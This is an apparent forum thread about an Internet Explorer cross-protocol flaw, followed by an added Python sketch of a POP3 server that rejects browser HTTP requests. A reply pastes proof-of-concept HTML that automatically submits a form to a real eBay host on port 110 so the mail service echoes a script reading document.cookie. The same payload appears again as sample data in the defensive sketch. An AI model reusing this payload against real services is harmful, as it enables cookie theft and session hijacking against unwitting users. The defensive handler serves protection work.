-
New IE vulnerability !!!
A malicious user can create a form which is submitted by the victim (automatically using Active Scripting or manually using Social Engineering). This form can cause a non-HTTP service to echo back JavaScript commands which in turn allow the malicious user to steal the cookie for that domain. There are more uses for this attack, other than just stealing cookies.
Read full article at www.xatrix.org
Exploit available.
-
Do you work for Xatrix? Oh well... Another good example of Microsoft.... If you're using Windows switch to Linux... If you don't want to.... At least use Opera..... :p
BTW I like the code they used... It's amazing no one figured this out sooner...
Code:
<script>
window.open("http://www.ebay.com","w");
setTimeout("form1.submit()",300);
</script>
<form name="form1" method="post" action="http://thompson.ebay.com:110/" enctype="multipart/form-data">
<textarea name="eostest">
user <script>alert(document.cookie)</script>
quit
</textarea>
<input type="submit" value="Submit">
</form>
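
Added example, not part of the posts above: a sketch of the service-side defence for the problem described in this thread, where a line-based service (POP3 here) receives a browser's form POST. The handler name `handle_session`, the placeholder host and the sample request are assumptions constructed for illustration; the handler closes the session as soon as it sees HTTP and never copies client input into a reply.

```python
import re

# First line of an HTTP request, e.g. "POST / HTTP/1.1"
HTTP_REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS|TRACE|PATCH) \S+ HTTP/\d\.\d$")
# Header names a browser sends; no POP3 command looks like this
HTTP_HEADER = re.compile(rb"^(Host|User-Agent|Content-Type|Content-Length|Cookie|Referer):", re.I)
POP3_COMMANDS = {b"USER", b"PASS", b"STAT", b"LIST", b"RETR", b"DELE", b"NOOP", b"RSET"}

# Constructed sample: what a browser writes to the socket when it submits
# the form from the post above (placeholder host, shortened headers).
BROWSER_POST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: mail.example.test:110\r\n"
    b"Content-Type: multipart/form-data; boundary=x\r\n"
    b"\r\n"
    b"--x\r\n"
    b'Content-Disposition: form-data; name="eostest"\r\n'
    b"\r\n"
    b"user <script>alert(document.cookie)</script>\r\n"
    b"quit\r\n"
    b"--x--\r\n"
)


def handle_session(raw: bytes):
    """Return (replies, closed_as_http) for one client connection.

    Hypothetical handler: every reply is a fixed string, so nothing the
    client sent can be reflected back to a browser.
    """
    replies = [b"+OK ready\r\n"]
    for line in raw.split(b"\r\n"):
        if HTTP_REQUEST_LINE.match(line) or HTTP_HEADER.match(line):
            # A browser is talking to us: stop before the form body is parsed.
            replies.append(b"-ERR HTTP is not spoken here\r\n")
            return replies, True
        verb = line.split(b" ", 1)[0].upper()
        if verb == b"QUIT":
            replies.append(b"+OK bye\r\n")
            break
        if verb in POP3_COMMANDS:
            replies.append(b"+OK\r\n")
        elif line:
            replies.append(b"-ERR unknown command\r\n")  # no echo of `line`
    return replies, False


if __name__ == "__main__":
    print(handle_session(BROWSER_POST))
```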